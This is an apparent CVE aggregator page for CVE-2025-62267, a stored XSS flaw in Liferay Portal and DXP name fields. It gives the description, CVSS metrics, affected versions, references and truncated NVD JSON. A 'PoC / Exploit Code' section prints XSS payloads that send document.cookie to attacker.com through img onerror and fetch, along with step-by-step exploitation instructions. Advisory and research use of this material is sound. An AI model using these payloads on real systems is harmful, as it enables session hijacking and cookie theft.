CVE-2025-62267

Description

Multiple cross-site scripting (XSS) vulnerabilities in web content template’s select structure page in Liferay Portal 7.4.3.35 through 7.4.3.111, and Liferay DXP 2023.Q4.0 through 2023.Q4.10, 2023.Q3.1 through 2023.Q3.10, 7.4 update 35 through update 92 allow remote attackers to inject arbitrary web script or HTML via a crafted payload injected into a user’s (1) First Name, (2) Middle Name, or (3) Last Name text field.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:liferay:digital_experience_platform:7.4:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:liferay:digital_experience_platform:7.4:update35:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:liferay:digital_experience_platform:7.4:update36:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:liferay:digital_experience_platform:7.4:update37:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:liferay:digital_experience_platform:7.4:update38:*:*:*:*:*:* - VULNERABLE

Liferay Portal 7.4.3.35 - 7.4.3.111

Liferay DXP 2023.Q4.0 - 2023.Q4.10

Liferay DXP 2023.Q3.1 - 2023.Q3.10

Liferay 7.4 Update 35 - Update 92

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-62267 PoC - Stored XSS via User Name Fields
// Payload for First Name, Middle Name, or Last Name field:

// Basic XSS payload
<script>alert(document.cookie)</script>

// Cookie stealing payload
<img src=x onerror="this.src='https://attacker.com/steal?c='+document.cookie">

// Session hijacking payload
<script>
  fetch('https://attacker.com/log?cookie='+btoa(document.cookie));
</script>

// Steps to exploit:
// 1. Navigate to Liferay Portal user profile settings
// 2. Inject XSS payload into First Name/Middle Name/Last Name field
// 3. Save the profile changes
// 4. Wait for admin or other user to view content template page
// 5. XSS payload executes in victim's browser context

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62267
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62267
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62267/
[4] VulDB https://vuldb.com/cve/CVE-2025-62267
[5] https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-62267

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62267", "sourceIdentifier": "[email protected]", "published": "2025-10-31T19:15:50.610", "lastModified": "2025-11-10T17:04:42.033", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple cross-site scripting (XSS) vulnerabilities in web content template’s select structure page in Liferay Portal 7.4.3.35 through 7.4.3.111, and Liferay DXP 2023.Q4.0 through 2023.Q4.10, 2023.Q3.1 through 2023.Q3.10, 7.4 update 35 through update 92 allow remote attackers to inject arbitrary web script or HTML via a crafted payload injected into a user’s (1) First Name, (2) Middle Name, or (3) Last Name text field."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:*:*:*:*:*:*:*", "matchCriteriaId": "8E19E344-92B4-4B46-BD89-25EC7191972C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update35:*:*:*:*:*:*", "matchCriteriaId": "341D1157-8118-4BD3-A902-36E90E066706"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update36:*:*:*:*:*:*", "matchCriteriaId": "1AB71307-7EAA-436A-9CBC-5A94F034FB48"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update37:*:*:*:*:*:*", "matchCriteriaId": "9446B3A5-6647-416C-92AF-7B6E0E929765"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update38:*:*:*:*:*:*", "matchCriteriaId": "06386C7A-CAA1-4FC4-9182-5A66342FB903"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update39:*:*:*:*:*:*", "matchCriteriaId": "8C84B701-B9A1-43D0-AF0C-30EDBD24CF90"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update40:*:*:*:*:*:*", "matchCriteriaId": "BA9AF651-D118-4437-B400-531B26BF6801"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update41:*:*:*:*:*:*", "matchCriteriaId": "2B256485-E289-4092-B45B-835DE12625B9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update42:*:*:*:*:*:*", "matchCriteriaId": "119B54BD-75F4-46A4-A57D-16CFF4E12CEB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update43:*:*:*:*:*:*", "matchCriteriaId": "A3382E2D-A414-40A1-A330-619859756A36"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update44:*:*:*:*:*:*", "matchCriteriaId": "2E07B750-55B6-4DB6-B02B-216C2F5505A9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update45:*:*:*:*:*:*", "matchCriteriaId": "B921E670-480F-4793-A636-3855A1654908"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update46: ... (truncated)